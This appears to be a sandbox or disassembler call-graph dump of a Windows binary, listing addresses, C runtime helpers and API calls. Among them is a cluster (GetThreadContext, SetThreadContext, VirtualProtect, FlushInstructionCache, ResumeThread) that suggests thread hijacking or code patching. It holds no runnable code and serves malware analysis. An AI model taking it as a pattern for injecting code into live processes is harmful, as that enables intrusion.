1f5a9689224 _CallSETranslator 9 API calls 8512->8514 8513->8509 8515 1f5a9688fa8 8514->8515 8516 1f5a968c248 23 API calls 8515->8516 8517 1f5a9688fb1 8516->8517 8518 1f5a968c248 23 API calls 8517->8518 8519 1f5a9688fbd 8518->8519 8924 1f5a9682438 GetProcessIdOfThread GetCurrentProcessId 8925 1f5a96824de 8924->8925 8926 1f5a9682463 CreateFileW 8924->8926 8926->8925 8927 1f5a9682497 WriteFile ReadFile CloseHandle 8926->8927 8927->8925 8928 1f5a968d63c 8929 1f5a968d661 8928->8929 8938 1f5a968d678 8928->8938 8930 1f5a968d24c __free_lconv_mon 11 API calls 8929->8930 8931 1f5a968d666 8930->8931 8933 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8931->8933 8932 1f5a968d730 8935 1f5a968ba9c 11 API calls 8932->8935 8934 1f5a968d671 8933->8934 8936 1f5a968d788 8935->8936 8937 1f5a968d790 8936->8937 8948 1f5a968d7c2 8936->8948 8940 1f5a968d2e4 __free_lconv_mon 11 API calls 8937->8940 8938->8932 8943 1f5a968d708 8938->8943 8945 1f5a968d6c5 8938->8945 8960 1f5a968d880 8938->8960 8942 1f5a968d797 8940->8942 8941 1f5a968d821 8944 1f5a968d2e4 __free_lconv_mon 11 API calls 8941->8944 8946 1f5a968d6e8 8942->8946 8949 1f5a968d2e4 __free_lconv_mon 11 API calls 8942->8949 8943->8946 8950 1f5a968d2e4 __free_lconv_mon 11 API calls 8943->8950 8947 1f5a968d82c 8944->8947 8945->8946 8953 1f5a968d2e4 __free_lconv_mon 11 API calls 8945->8953 8952 1f5a968d2e4 __free_lconv_mon 11 API calls 8946->8952 8951 1f5a968d845 8947->8951 8955 1f5a968d2e4 __free_lconv_mon 11 API calls 8947->8955 8948->8941 8948->8948 8957 1f5a968d867 8948->8957 8982 1f5a9690af0 8948->8982 8949->8942 8950->8943 8956 1f5a968d2e4 __free_lconv_mon 11 API calls 8951->8956 8952->8934 8953->8945 8955->8947 8956->8934 8958 1f5a968d130 _invalid_parameter_noinfo 17 API calls 8957->8958 8959 1f5a968d87c 8958->8959 8961 1f5a968d8ae 8960->8961 8961->8961 8962 1f5a968d26c __free_lconv_mon 11 API calls 8961->8962 8963 1f5a968d8f9 8962->8963 8964 1f5a9690af0 49 API calls 8963->8964 8965 1f5a968d92f 8964->8965 8966 1f5a968d130 
_invalid_parameter_noinfo 17 API calls 8965->8966 8967 1f5a968da03 8966->8967 8968 1f5a968dd54 23 API calls 8967->8968 8969 1f5a968dae6 8968->8969 8970 1f5a968f148 5 API calls 8969->8970 8971 1f5a968db11 8970->8971 8991 1f5a968d334 8971->8991 8974 1f5a968dbad 8975 1f5a968dd54 23 API calls 8974->8975 8976 1f5a968dbdd 8975->8976 8977 1f5a968f148 5 API calls 8976->8977 8978 1f5a968dc06 8977->8978 9013 1f5a968d4b0 8978->9013 8981 1f5a968d880 59 API calls 8987 1f5a9690b0d 8982->8987 8983 1f5a9690b12 8984 1f5a9690b28 8983->8984 8985 1f5a968d24c __free_lconv_mon 11 API calls 8983->8985 8984->8948 8986 1f5a9690b1c 8985->8986 8988 1f5a968d110 _invalid_parameter_noinfo 49 API calls 8986->8988 8987->8983 8987->8984 8989 1f5a9690b5c 8987->8989 8988->8984 8989->8984 8990 1f5a968d24c __free_lconv_mon 11 API calls 8989->8990 8990->8986 8992 1f5a968d35e 8991->8992 8993 1f5a968d382 8991->8993 8994 1f5a968d36d FindFirstFileExW 8992->8994 8998 1f5a968d2e4 __free_lconv_mon 11 API calls 8992->8998 8995 1f5a968d387 8993->8995 8996 1f5a968d3dc 8993->8996 8994->8974 8995->8994 9001 1f5a968d2e4 __free_lconv_mon 11 API calls 8995->9001 9005 1f5a968d39c 8995->9005 8997 1f5a968ec1c MultiByteToWideChar 8996->8997 9000 1f5a968d3f8 8997->9000 8998->8994 8999 1f5a968d3ff GetLastError 9003 1f5a968d1c0 11 API calls 8999->9003 9000->8999 9004 1f5a968d43a 9000->9004 9008 1f5a968d42d 9000->9008 9011 1f5a968d2e4 __free_lconv_mon 11 API calls 9000->9011 9001->9005 9002 1f5a968c5ac 12 API calls 9002->8994 9007 1f5a968d40c 9003->9007 9004->8994 9006 1f5a968ec1c MultiByteToWideChar 9004->9006 9005->9002 9009 1f5a968d47e 9006->9009 9010 1f5a968d24c __free_lconv_mon 11 API calls 9007->9010 9012 1f5a968c5ac 12 API calls 9008->9012 9009->8994 9009->8999 9010->8994 9011->9008 9012->9004 9014 1f5a968d4fe 9013->9014 9015 1f5a968d4da 9013->9015 9016 1f5a968d504 9014->9016 9017 1f5a968d558 9014->9017 9019 1f5a968d2e4 __free_lconv_mon 11 API calls 9015->9019 9022 1f5a968d4e9 9015->9022 9020 1f5a968d519 9016->9020 
9016->9022 9023 1f5a968d2e4 __free_lconv_mon 11 API calls 9016->9023 9018 1f5a968ecac WideCharToMultiByte 9017->9018 9030 1f5a968d57c 9018->9030 9019->9022 9024 1f5a968c5ac 12 API calls 9020->9024 9021 1f5a968d583 GetLastError 9025 1f5a968d1c0 11 API calls 9021->9025 9022->8981 9023->9020 9024->9022 9028 1f5a968d590 9025->9028 9026 1f5a968d5c0 9026->9022 9027 1f5a968ecac WideCharToMultiByte 9026->9027 9031 1f5a968d60c 9027->9031 9032 1f5a968d24c __free_lconv_mon 11 API calls 9028->9032 9029 1f5a968d5b4 9034 1f5a968c5ac 12 API calls 9029->9034 9030->9021 9030->9026 9030->9029 9033 1f5a968d2e4 __free_lconv_mon 11 API calls 9030->9033 9031->9021 9031->9022 9032->9022 9033->9029 9034->9026 8520 1f5a96953ce 8521 1f5a9689224 _CallSETranslator 9 API calls 8520->8521 8522 1f5a96953dc 8521->8522 8523 1f5a96953e7 8522->8523 8524 1f5a9689224 _CallSETranslator 9 API calls 8522->8524 8524->8523 8525 1f5a968f3d0 GetProcessHeap 8329 1f5a9682d50 8331 1f5a9682dad 8329->8331 8330 1f5a9682dc8 8331->8330 8332 1f5a9683684 3 API calls 8331->8332 8332->8330 8526 1f5a96951cf 8527 1f5a96951e7 8526->8527 8533 1f5a9695252 8526->8533 8528 1f5a9689224 _CallSETranslator 9 API calls 8527->8528 8527->8533 8529 1f5a9695234 8528->8529 8530 1f5a9689224 _CallSETranslator 9 API calls 8529->8530 8531 1f5a9695249 8530->8531 8532 1f5a968c248 23 API calls 8531->8532 8532->8533 7605 1f5a968c0d4 7608 1f5a968be84 7605->7608 7615 1f5a968be4c 7608->7615 7616 1f5a968be61 7615->7616 7617 1f5a968be5c 7615->7617 7619 1f5a968be68 7616->7619 7618 1f5a968be08 11 API calls 7617->7618 7618->7616 7620 1f5a968be7d 7619->7620 7621 1f5a968be78 7619->7621 7623 1f5a968be08 7620->7623 7622 1f5a968be08 11 API calls 7621->7622 7622->7620 7624 1f5a968be0d 7623->7624 7625 1f5a968be3e 7623->7625 7626 1f5a968be36 7624->7626 7629 1f5a968d2e4 7624->7629 7628 1f5a968d2e4 __free_lconv_mon 11 API calls 7626->7628 7628->7625 7630 1f5a968d31a 7629->7630 7631 1f5a968d2e9 HeapFree 7629->7631 7630->7624 7631->7630 7632 1f5a968d304 
GetLastError 7631->7632 7633 1f5a968d311 __free_lconv_mon 7632->7633 7635 1f5a968d24c 7633->7635 7638 1f5a968cb40 GetLastError 7635->7638 7637 1f5a968d255 7637->7630 7639 1f5a968cb81 FlsSetValue 7638->7639 7644 1f5a968cb64 7638->7644 7640 1f5a968cb71 SetLastError 7639->7640 7641 1f5a968cb93 7639->7641 7640->7637 7655 1f5a968d26c 7641->7655 7644->7639 7644->7640 7646 1f5a968cbc0 FlsSetValue 7649 1f5a968cbde 7646->7649 7650 1f5a968cbcc FlsSetValue 7646->7650 7647 1f5a968cbb0 FlsSetValue 7648 1f5a968cbb9 7647->7648 7652 1f5a968d2e4 __free_lconv_mon 5 API calls 7648->7652 7662 1f5a968c734 7649->7662 7650->7648 7652->7640 7660 1f5a968d27d __free_lconv_mon 7655->7660 7656 1f5a968d2ce 7659 1f5a968d24c __free_lconv_mon 10 API calls 7656->7659 7657 1f5a968d2b2 HeapAlloc 7658 1f5a968cba2 7657->7658 7657->7660 7658->7646 7658->7647 7659->7658 7660->7656 7660->7657 7667 1f5a968b3fc 7660->7667 7676 1f5a968c60c 7662->7676 7670 1f5a968b43c 7667->7670 7675 1f5a968c53c EnterCriticalSection 7670->7675 7688 1f5a968c53c EnterCriticalSection 7676->7688 8534 1f5a968afd4 8541 1f5a968af07 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8534->8541 8535 1f5a968affb 8536 1f5a9689224 _CallSETranslator 9 API calls 8535->8536 8537 1f5a968b000 8536->8537 8538 1f5a9689224 _CallSETranslator 9 API calls 8537->8538 8540 1f5a968b00b __FrameHandler3::GetHandlerSearchState 8537->8540 8538->8540 8539 1f5a96898cc 9 API calls Is_bad_exception_allowed 8539->8541 8541->8535 8541->8539 8541->8540 8543 1f5a96898f4 8541->8543 8544 1f5a9689224 _CallSETranslator 9 API calls 8543->8544 8545 1f5a9689902 8544->8545 8545->8541 7690 1f5a968ccc8 7691 1f5a968ccd8 7690->7691 7692 1f5a968cb40 __free_lconv_mon 11 API calls 7691->7692 7693 1f5a968cce3 __vcrt_uninitialize_ptd 7691->7693 7692->7693 9044 1f5a968ac48 9045 1f5a9689224 _CallSETranslator 9 API calls 9044->9045 9046 1f5a968ac7d 9045->9046 9047 1f5a9689224 _CallSETranslator 9 API calls 9046->9047 9048 1f5a968ac8b __except_validate_context_record 
9047->9048 9049 1f5a9689224 _CallSETranslator 9 API calls 9048->9049 9050 1f5a968accf 9049->9050 9051 1f5a9689224 _CallSETranslator 9 API calls 9050->9051 9052 1f5a968acd8 9051->9052 9053 1f5a9689224 _CallSETranslator 9 API calls 9052->9053 9054 1f5a968ace1 9053->9054 9067 1f5a968983c 9054->9067 9057 1f5a9689224 _CallSETranslator 9 API calls 9058 1f5a968ad11 __CxxCallCatchBlock 9057->9058 9059 1f5a9689878 __CxxCallCatchBlock 9 API calls 9058->9059 9063 1f5a968adc2 9059->9063 9060 1f5a968adeb __CxxCallCatchBlock 9061 1f5a9689224 _CallSETranslator 9 API calls 9060->9061 9062 1f5a968adfe 9061->9062 9064 1f5a9689224 _CallSETranslator 9 API calls 9062->9064 9063->9060 9065 1f5a9688ef8 __CxxCallCatchBlock 9 API calls 9063->9065 9066 1f5a968ae07 9064->9066 9065->9060 9068 1f5a9689224 _CallSETranslator 9 API calls 9067->9068 9069 1f5a968984d 9068->9069 9070 1f5a9689858 9069->9070 9071 1f5a9689224 _CallSETranslator 9 API calls 9069->9071 9072 1f5a9689224 _CallSETranslator 9 API calls 9070->9072 9071->9070 9073 1f5a9689869 9072->9073 9073->9057 9073->9058 8546 1f5a9683fc9 8547 1f5a9683f16 8546->8547 8548 1f5a9683f66 VirtualQuery 8547->8548 8549 1f5a9683f80 8547->8549 8550 1f5a9683f9a VirtualAlloc 8547->8550 8548->8547 8548->8549 8550->8549 8551 1f5a9683fcb GetLastError 8550->8551 8551->8547 8552 1f5a9685dc9 8553 1f5a9685dd0 VirtualProtect 8552->8553 8554 1f5a9685ce0 8553->8554 8555 1f5a9685df9 GetLastError 8553->8555 8555->8554 8333 1f5a969314b 8334 1f5a96933f0 8333->8334 8335 1f5a969318b 8333->8335 8336 1f5a96933e6 8334->8336 8340 1f5a9693f00 _log10_special 20 API calls 8334->8340 8335->8334 8337 1f5a96931bf 8335->8337 8338 1f5a96933d2 8335->8338 8341 1f5a9693f00 8338->8341 8340->8336 8344 1f5a9693f20 8341->8344 8345 1f5a9693f3a 8344->8345 8346 1f5a9693f1b 8345->8346 8348 1f5a9693d60 8345->8348 8346->8336 8349 1f5a9693da0 _log10_special 8348->8349 8351 1f5a9693e0c _log10_special 8349->8351 8359 1f5a9694020 8349->8359 8352 1f5a9693e49 8351->8352 8354 1f5a9693e19 8351->8354 
8366 1f5a9694350 8352->8366 8362 1f5a9693c3c 8354->8362 8356 1f5a9693e47 _log10_special 8357 1f5a9687e40 _log10_special 8 API calls 8356->8357 8358 1f5a9693e71 8357->8358 8358->8346 8372 1f5a9694048 8359->8372 8363 1f5a9693c80 _log10_special 8362->8363 8364 1f5a9693c95 8363->8364 8365 1f5a9694350 _log10_special 11 API calls 8363->8365 8364->8356 8365->8364 8367 1f5a9694370 8366->8367 8368 1f5a9694359 8366->8368 8369 1f5a968d24c __free_lconv_mon 11 API calls 8367->8369 8370 1f5a9694368 8368->8370 8371 1f5a968d24c __free_lconv_mon 11 API calls 8368->8371 8369->8370 8370->8356 8371->8370 8373 1f5a9694087 _raise_exc _clrfp 8372->8373 8374 1f5a969429c RaiseException 8373->8374 8375 1f5a9694042 8374->8375 8375->8351 7694 1f5a96884a0 7697 1f5a9688fc0 7694->7697 7696 1f5a96884c9 7698 1f5a9689016 __std_exception_destroy 7697->7698 7699 1f5a9688fe1 7697->7699 7698->7696 7699->7698 7701 1f5a968c288 7699->7701 7702 1f5a968c295 7701->7702 7704 1f5a968c29f 7701->7704 7702->7704 7708 1f5a968c2ba 7702->7708 7703 1f5a968d24c __free_lconv_mon 11 API calls 7705 1f5a968c2a6 7703->7705 7704->7703 7710 1f5a968d110 7705->7710 7706 1f5a968c2b2 7706->7698 7708->7706 7709 1f5a968d24c __free_lconv_mon 11 API calls 7708->7709 7709->7705 7713 1f5a968cfa8 7710->7713 7714 1f5a968cfd3 7713->7714 7721 1f5a968d044 7714->7721 7717 1f5a968d01d 7718 1f5a968d032 7717->7718 7720 1f5a968c340 _invalid_parameter_noinfo 28 API calls 7717->7720 7718->7706 7720->7718 7744 1f5a968cd8c 7721->7744 7724 1f5a968cffa 7724->7717 7731 1f5a968c340 7724->7731 7732 1f5a968c34f GetLastError 7731->7732 7733 1f5a968c398 7731->7733 7734 1f5a968c364 7732->7734 7733->7717 7735 1f5a968cc08 _invalid_parameter_noinfo 14 API calls 7734->7735 7736 1f5a968c37e SetLastError 7735->7736 7736->7733 7737 1f5a968c3a1 7736->7737 7738 1f5a968c340 _invalid_parameter_noinfo 26 API calls 7737->7738 7739 1f5a968c3c7 7738->7739 7793 1f5a968ffd0 7739->7793 7745 1f5a968cde3 7744->7745 7746 1f5a968cda8 GetLastError 7744->7746 7745->7724 7750 
1f5a968cdf8 7745->7750 7747 1f5a968cdb8 7746->7747 7757 1f5a968cc08 7747->7757 7751 1f5a968ce14 GetLastError SetLastError 7750->7751 7752 1f5a968ce2c 7750->7752 7751->7752 7752->7724 7753 1f5a968d130 IsProcessorFeaturePresent 7752->7753 7754 1f5a968d143 7753->7754 7771 1f5a968ce44 7754->7771 7758 1f5a968cc27 FlsGetValue 7757->7758 7760 1f5a968cc3c 7757->7760 7759 1f5a968cc34 SetLastError 7758->7759 7758->7760 7759->7745 7760->7759 7761 1f5a968d26c __free_lconv_mon 11 API calls 7760->7761 7762 1f5a968cc5e 7761->7762 7763 1f5a968cc7c FlsSetValue 7762->7763 7766 1f5a968cc6c 7762->7766 7764 1f5a968cc88 FlsSetValue 7763->7764 7765 1f5a968cc9a 7763->7765 7764->7766 7767 1f5a968c734 __free_lconv_mon 11 API calls 7765->7767 7768 1f5a968d2e4 __free_lconv_mon 11 API calls 7766->7768 7769 1f5a968cca2 7767->7769 7768->7759 7770 1f5a968d2e4 __free_lconv_mon 11 API calls 7769->7770 7770->7759 7772 1f5a968ce7e _invalid_parameter_noinfo 7771->7772 7773 1f5a968cea6 RtlCaptureContext RtlLookupFunctionEntry 7772->7773 7774 1f5a968cee0 RtlVirtualUnwind 7773->7774 7775 1f5a968cf16 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7773->7775 7774->7775 7776 1f5a968cf68 _invalid_parameter_noinfo 7775->7776 7779 1f5a9687e40 7776->7779 7782 1f5a9687e49 7779->7782 7780 1f5a9688618 IsProcessorFeaturePresent 7783 1f5a9688630 7780->7783 7781 1f5a9687e54 GetCurrentProcess TerminateProcess 7782->7780 7782->7781 7788 1f5a9688810 RtlCaptureContext 7783->7788 7789 1f5a968882a RtlLookupFunctionEntry 7788->7789 7790 1f5a9688840 RtlVirtualUnwind 7789->7790 7791 1f5a9688643 7789->7791 7790->7789 7790->7791 7792 1f5a96885e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7791->7792 7794 1f5a968c3ef 7793->7794 7795 1f5a968ffe9 7793->7795 7797 1f5a969003c 7794->7797 7795->7794 7801 1f5a96905fc 7795->7801 7798 1f5a9690055 7797->7798 7799 1f5a968c3ff 7797->7799 7798->7799 7847 1f5a968e890 7798->7847 7799->7717 7810 1f5a968c9c8 GetLastError 
7801->7810 7803 1f5a969060b 7809 1f5a9690651 7803->7809 7846 1f5a968c53c EnterCriticalSection 7803->7846 7809->7794 7811 1f5a968ca09 FlsSetValue 7810->7811 7812 1f5a968c9ec FlsGetValue 7810->7812 7814 1f5a968ca1b 7811->7814 7827 1f5a968c9f9 7811->7827 7813 1f5a968ca03 7812->7813 7812->7827 7813->7811 7816 1f5a968d26c __free_lconv_mon 11 API calls 7814->7816 7815 1f5a968ca75 SetLastError 7817 1f5a968ca82 7815->7817 7824 1f5a968ca95 7815->7824 7818 1f5a968ca2a 7816->7818 7817->7803 7819 1f5a968ca48 FlsSetValue 7818->7819 7820 1f5a968ca38 FlsSetValue 7818->7820 7822 1f5a968ca54 FlsSetValue 7819->7822 7823 1f5a968ca66 7819->7823 7821 1f5a968ca41 7820->7821 7825 1f5a968d2e4 __free_lconv_mon 11 API calls 7821->7825 7822->7821 7826 1f5a968c734 __free_lconv_mon 11 API calls 7823->7826 7828 1f5a968caad FlsGetValue 7824->7828 7829 1f5a968cac8 FlsSetValue 7824->7829 7825->7827 7830 1f5a968ca6e 7826->7830 7827->7815 7833 1f5a968cac2 7828->7833 7834 1f5a968caba 7828->7834 7832 1f5a968cad5 7829->7832 7829->7834 7831 1f5a968d2e4 __free_lconv_mon 11 API calls 7830->7831 7831->7815 7835 1f5a968d26c __free_lconv_mon 11 API calls 7832->7835 7833->7829 7834->7803 7836 1f5a968cae4 7835->7836 7837 1f5a968cb02 FlsSetValue 7836->7837 7838 1f5a968caf2 FlsSetValue 7836->7838 7839 1f5a968cb0e FlsSetValue 7837->7839 7840 1f5a968cb20 7837->7840 7841 1f5a968cafb 7838->7841 7839->7841 7842 1f5a968c734 __free_lconv_mon 11 API calls 7840->7842 7843 1f5a968d2e4 __free_lconv_mon 11 API calls 7841->7843 7844 1f5a968cb28 7842->7844 7843->7834 7844->7834 7845 1f5a968d2e4 __free_lconv_mon 11 API calls 7844->7845 7845->7834 7848 1f5a968c9c8 _invalid_parameter_noinfo 23 API calls 7847->7848 7849 1f5a968e899 7848->7849 7850 1f5a969549a 7851 1f5a96954b3 7850->7851 7852 1f5a96954a9 7850->7852 7854 1f5a968c590 LeaveCriticalSection 7852->7854 7855 1f5a968ee9c 7856 1f5a968eebe 7855->7856 7857 1f5a968eedb 7855->7857 7856->7857 7859 1f5a968eecc 7856->7859 7858 1f5a968eee5 7857->7858 7864 1f5a9691658 7857->7864 
7871 1f5a9691694 7858->7871 7860 1f5a968d24c __free_lconv_mon 11 API calls 7859->7860 7862 1f5a968eed1 7860->7862 7865 1f5a9691661 7864->7865 7866 1f5a969167a HeapSize 7864->7866 7867 1f5a968d24c __free_lconv_mon 11 API calls 7865->7867 7868 1f5a9691666 7867->7868 7869 1f5a968d110 _invalid_parameter_noinfo 49 API calls 7868->7869 7870 1f5a9691671 7869->7870 7870->7858 7872 1f5a96916b3 7871->7872 7873 1f5a96916a9 7871->7873 7875 1f5a96916b8 7872->7875 7882 1f5a96916bf __free_lconv_mon 7872->7882 7883 1f5a968c5ac 7873->7883 7879 1f5a968d2e4 __free_lconv_mon 11 API calls 7875->7879 7876 1f5a96916f2 HeapReAlloc 7878 1f5a96916b1 7876->7878 7876->7882 7877 1f5a96916c5 7880 1f5a968d24c __free_lconv_mon 11 API calls 7877->7880 7878->7862 7879->7878 7880->7878 7881 1f5a968b3fc __free_lconv_mon 2 API calls 7881->7882 7882->7876 7882->7877 7882->7881 7884 1f5a968c5f7 7883->7884 7888 1f5a968c5bb __free_lconv_mon 7883->7888 7886 1f5a968d24c __free_lconv_mon 11 API calls 7884->7886 7885 1f5a968c5de HeapAlloc 7887 1f5a968c5f5 7885->7887 7885->7888 7886->7887 7887->7878 7888->7884 7888->7885 7889 1f5a968b3fc __free_lconv_mon 2 API calls 7888->7889 7889->7888 8556 1f5a9685d9c 8557 1f5a9685da3 8556->8557 8558 1f5a9685dd0 VirtualProtect 8557->8558 8560 1f5a9685ce0 8557->8560 8559 1f5a9685df9 GetLastError 8558->8559 8558->8560 8559->8560 9074 1f5a968801c 9076 1f5a9688040 __scrt_acquire_startup_lock 9074->9076 9075 1f5a968b485 9076->9075 9077 1f5a968cb40 __free_lconv_mon 11 API calls 9076->9077 9078 1f5a968b4ae 9077->9078 8376 1f5a9687d30 8377 1f5a9687d51 8376->8377 8378 1f5a9687d4c 8376->8378 8380 1f5a9687e60 8378->8380 8381 1f5a9687e83 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8380->8381 8382 1f5a9687ef7 8380->8382 8381->8382 8382->8377 8383 1f5a9695332 8384 1f5a9689878 __CxxCallCatchBlock 9 API calls 8383->8384 8388 1f5a9695345 8384->8388 8385 1f5a9695384 __CxxCallCatchBlock 8386 1f5a9689224 _CallSETranslator 9 API calls 8385->8386 8387 
1f5a9695398 8386->8387 8389 1f5a9689224 _CallSETranslator 9 API calls 8387->8389 8388->8385 8390 1f5a9688ef8 __CxxCallCatchBlock 9 API calls 8388->8390 8391 1f5a96953a8 8389->8391 8390->8385 8561 1f5a96861b3 8562 1f5a96861c0 8561->8562 8563 1f5a96861cc GetThreadContext 8562->8563 8569 1f5a968632a 8562->8569 8564 1f5a96861f2 8563->8564 8563->8569 8568 1f5a9686219 8564->8568 8564->8569 8565 1f5a968640e 8567 1f5a968642e 8565->8567 8579 1f5a96848f0 8565->8579 8566 1f5a9686351 VirtualProtect FlushInstructionCache 8566->8569 8583 1f5a9685300 GetCurrentProcess 8567->8583 8571 1f5a968629d 8568->8571 8573 1f5a9686276 SetThreadContext 8568->8573 8569->8565 8569->8566 8573->8571 8574 1f5a9686487 8577 1f5a9687e40 _log10_special 8 API calls 8574->8577 8575 1f5a9686447 ResumeThread 8576 1f5a9686433 8575->8576 8576->8574 8576->8575 8578 1f5a96864cf 8577->8578 8581 1f5a968490c 8579->8581 8580 1f5a968496f 8580->8567 8581->8580 8582 1f5a9684922 VirtualFree 8581->8582 8582->8581 8584 1f5a968531c 8583->8584 8585 1f5a9685332 VirtualProtect FlushInstructionCache 8584->8585 8586 1f5a9685363 8584->8586 8585->8584 8586->8576 8392 1f5a968ff28 8393 1f5a968ff33 8392->8393 8401 1f5a9692828 8393->8401 8414 1f5a968c53c EnterCriticalSection 8401->8414 9079 1f5a968f62c 9080 1f5a968f638 9079->9080 9082 1f5a968f65f 9080->9082 9083 1f5a969185c 9080->9083 9084 1f5a9691861 9083->9084 9088 1f5a969189c 9083->9088 9085 1f5a9691882 DeleteCriticalSection 9084->9085 9086 1f5a9691894 9084->9086 9085->9085 9085->9086 9087 1f5a968d2e4 __free_lconv_mon 11 API calls 9086->9087 9087->9088 9088->9080 7890 1f5a9682aac 7892 1f5a9682af2 7890->7892 7891 1f5a9682b58 7892->7891 7894 1f5a9683d58 7892->7894 7895 1f5a9683d7a 7894->7895 7896 1f5a9683d65 StrCmpNIW 7894->7896 7895->7892 7896->7895 8415 1f5a968c12c 8416 1f5a968c15d 8415->8416 8417 1f5a968c145 8415->8417 8417->8416 8418 1f5a968d2e4 __free_lconv_mon 11 API calls 8417->8418 8418->8416 8587 1f5a968a9ac 8588 1f5a968a9d9 __except_validate_context_record 8587->8588 
8589 1f5a9689224 _CallSETranslator 9 API calls 8588->8589 8590 1f5a968a9de 8589->8590 8592 1f5a968aa38 8590->8592 8593 1f5a968aac6 8590->8593 8603 1f5a968aa8c 8590->8603 8591 1f5a968aab3 8616 1f5a96894d0 8591->8616 8592->8591 8598 1f5a968aa5a __GetCurrentState 8592->8598 8592->8603 8597 1f5a968aae5 8593->8597 8623 1f5a96898cc 8593->8623 8600 1f5a968ab34 8597->8600 8597->8603 8626 1f5a96898e0 8597->8626 8601 1f5a968abdd 8598->8601 8604 1f5a968aeb8 8598->8604 8600->8603 8629 1f5a968a12c 8600->8629 8605 1f5a96898cc Is_bad_exception_allowed 9 API calls 8604->8605 8606 1f5a968aee7 __GetCurrentState 8605->8606 8607 1f5a9689224 _CallSETranslator 9 API calls 8606->8607 8614 1f5a968af04 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8607->8614 8608 1f5a968affb 8609 1f5a9689224 _CallSETranslator 9 API calls 8608->8609 8610 1f5a968b000 8609->8610 8611 1f5a9689224 _CallSETranslator 9 API calls 8610->8611 8612 1f5a968b00b __FrameHandler3::GetHandlerSearchState 8610->8612 8611->8612 8612->8603 8613 1f5a96898cc 9 API calls Is_bad_exception_allowed 8613->8614 8614->8608 8614->8612 8614->8613 8615 1f5a96898f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8614->8615 8615->8614 8686 1f5a9689534 8616->8686 8618 1f5a96894ef __FrameHandler3::ExecutionInCatch 8690 1f5a9689440 8618->8690 8621 1f5a968aeb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8622 1f5a9689524 8621->8622 8622->8603 8624 1f5a9689224 _CallSETranslator 9 API calls 8623->8624 8625 1f5a96898d5 8624->8625 8625->8597 8627 1f5a9689224 _CallSETranslator 9 API calls 8626->8627 8628 1f5a96898e9 8627->8628 8628->8600 8694 1f5a968b044 8629->8694 8631 1f5a968a5f4 8632 1f5a968a545 8632->8631 8634 1f5a968a543 8632->8634 8747 1f5a968a5fc 8632->8747 8633 1f5a968a273 8633->8632 8660 1f5a968a2ab 8633->8660 8636 1f5a9689224 _CallSETranslator 9 API calls 8634->8636 8640 1f5a968a587 8636->8640 8637 1f5a968a475 8637->8634 8643 1f5a968a492 8637->8643 8645 1f5a96898cc Is_bad_exception_allowed 9 API calls 8637->8645 
8638 1f5a9689224 _CallSETranslator 9 API calls 8641 1f5a968a1da 8638->8641 8640->8631 8642 1f5a9687e40 _log10_special 8 API calls 8640->8642 8641->8640 8646 1f5a9689224 _CallSETranslator 9 API calls 8641->8646 8644 1f5a968a59a 8642->8644 8643->8634 8649 1f5a968a4b4 8643->8649 8740 1f5a96894a4 8643->8740 8644->8603 8645->8643 8648 1f5a968a1ea 8646->8648 8650 1f5a9689224 _CallSETranslator 9 API calls 8648->8650 8649->8634 8651 1f5a968a4ca 8649->8651 8683 1f5a968a5d7 8649->8683 8652 1f5a968a1f3 8650->8652 8653 1f5a968a4d5 8651->8653 8656 1f5a96898cc Is_bad_exception_allowed 9 API calls 8651->8656 8705 1f5a968990c 8652->8705 8659 1f5a968b0dc 9 API calls 8653->8659 8654 1f5a9689224 _CallSETranslator 9 API calls 8657 1f5a968a5dd 8654->8657 8656->8653 8661 1f5a9689224 _CallSETranslator 9 API calls 8657->8661 8663 1f5a968a4eb 8659->8663 8660->8637 8670 1f5a96898e0 9 API calls 8660->8670 8719 1f5a968a86c 8660->8719 8733 1f5a968a058 8660->8733 8662 1f5a968a5e6 8661->8662 8665 1f5a968c248 23 API calls 8662->8665 8663->8634 8667 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8663->8667 8664 1f5a9689224 _CallSETranslator 9 API calls 8666 1f5a968a235 8664->8666 8665->8631 8666->8633 8669 1f5a9689224 _CallSETranslator 9 API calls 8666->8669 8668 1f5a968a505 8667->8668 8744 1f5a9689738 RtlUnwindEx 8668->8744 8672 1f5a968a241 8669->8672 8670->8660 8673 1f5a9689224 _CallSETranslator 9 API calls 8672->8673 8675 1f5a968a24a 8673->8675 8708 1f5a968b0dc 8675->8708 8679 1f5a968a25e 8715 1f5a968b1cc 8679->8715 8681 1f5a968a5d1 8682 1f5a968c248 23 API calls 8681->8682 8682->8683 8683->8654 8684 1f5a968a266 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8684->8681 8685 1f5a9689078 Concurrency::cancel_current_task 2 API calls 8684->8685 8685->8681 8689 1f5a9689562 __FrameHandler3::ExecutionInCatch 8686->8689 8687 1f5a96895d4 8687->8618 8688 1f5a968958c RtlLookupFunctionEntry 8688->8689 8689->8687 8689->8688 8691 1f5a9689460 8690->8691 8692 1f5a968948b 8690->8692 8691->8692 8693 
1f5a9689224 _CallSETranslator 9 API calls 8691->8693 8692->8621 8693->8691 8695 1f5a968b069 __FrameHandler3::ExecutionInCatch 8694->8695 8696 1f5a9689534 __SetUnwindTryBlock RtlLookupFunctionEntry 8695->8696 8697 1f5a968b07e 8696->8697 8759 1f5a9689cb4 8697->8759 8700 1f5a968b090 __FrameHandler3::GetHandlerSearchState 8762 1f5a9689cec 8700->8762 8701 1f5a968b0b3 8702 1f5a9689cb4 __GetUnwindTryBlock RtlLookupFunctionEntry 8701->8702 8704 1f5a968a18e 8702->8704 8704->8631 8704->8633 8704->8638 8706 1f5a9689224 _CallSETranslator 9 API calls 8705->8706 8707 1f5a968991a 8706->8707 8707->8631 8707->8664 8709 1f5a968b1c3 8708->8709 8711 1f5a968b107 8708->8711 8710 1f5a968a25a 8710->8633 8710->8679 8711->8710 8712 1f5a96898e0 9 API calls 8711->8712 8713 1f5a96898cc Is_bad_exception_allowed 9 API calls 8711->8713 8714 1f5a968a86c 9 API calls 8711->8714 8712->8711 8713->8711 8714->8711 8716 1f5a968b239 8715->8716 8717 1f5a968b1e9 Is_bad_exception_allowed 8715->8717 8716->8684 